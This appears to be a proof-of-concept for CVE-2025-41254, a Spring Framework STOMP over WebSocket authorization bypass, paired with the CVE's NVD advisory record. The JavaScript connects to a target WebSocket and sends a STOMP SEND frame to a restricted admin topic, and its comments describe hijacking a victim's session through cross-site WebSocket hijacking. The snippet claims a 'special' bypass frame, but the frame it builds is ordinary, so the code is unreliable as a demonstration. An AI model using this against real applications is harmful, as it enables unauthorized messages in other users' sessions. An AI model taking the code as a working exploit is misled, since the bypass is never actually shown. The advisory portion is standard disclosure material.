CVE-2025-41254

// CVE-2025-41254 PoC - STOMP over WebSocket Security Bypass // This PoC demonstrates how an attacker can bypass authorization checks // in Spring Framework's STOMP over WebSocket implementation // Step 1: Establish a WebSocket connection to the vulnerable Spring application const WebSocket = require('ws'); const ws = new WebSocket('wss://target-app.com/websocket-endpoint'); // Step 2: Send STOMP CONNECT frame ws.on('open', () => { const connectFrame = 'CONNECT\naccept-version:1.2\nhost:target-app.com\n\n\u0000'; ws.send(connectFrame); }); // Step 3: After connection is established, send an unauthorized SEND frame // bypassing the normal authorization checks ws.on('message', (data) => { if (data.toString().startsWith('CONNECTED')) { // Bypass authorization by crafting a special STOMP SEND frame // targeting a restricted destination const unauthorizedSendFrame = 'SEND\n' + 'destination:/topic/admin/messages\n' + 'content-type:application/json\n' + '\n' + '{"content":"unauthorized message"}\u0000'; ws.send(unauthorizedSendFrame); } }); // Note: In a real attack scenario, the attacker might need to: // 1. Trick a victim into establishing an authenticated WebSocket session // 2. Use Cross-Site WebSocket Hijacking (CSWSH) to send messages // through the victim's authenticated session // 3. The bypass works because the authorization check is not properly // enforced on certain code paths in the message handling pipeline

{"cve": {"id": "CVE-2025-41254", "sourceIdentifier": "[email protected]", "published": "2025-10-16T15:15:33.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "STOMP over WebSocket applications may be vulnerable to a security bypass that allows an attacker to send unauthorized messages.\n\nAffected Spring Products and VersionsSpring Framework:\n\n * 6.2.0 - 6.2.11\n * 6.1.0 - 6.1.23\n * 6.0.x - 6.0.29\n * 5.3.0 - 5.3.45\n * Older, unsupported versions are also affected.\n\n\nMitigationUsers of affected versions should upgrade to the corresponding fixed version.\n\nAffected version(s)Fix versionAvailability6.2.x6.2.12OSS6.1.x6.1.24 Commercial https://enterprise.spring.io/ 6.0.xN/A Out of support https://spring.io/projects/spring-framework#support 5.3.x5.3.46 Commercial https://enterprise.spring.io/ No further mitigation steps are necessary.\n\nCreditThis vulnerability was discovered and responsibly reported by Jannis Kaiser."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N&version=3.1", "source": "[email protected]"}, {"url": "https://spring.io/security/cve/2025-41254", "source": "[email protected]"}]}}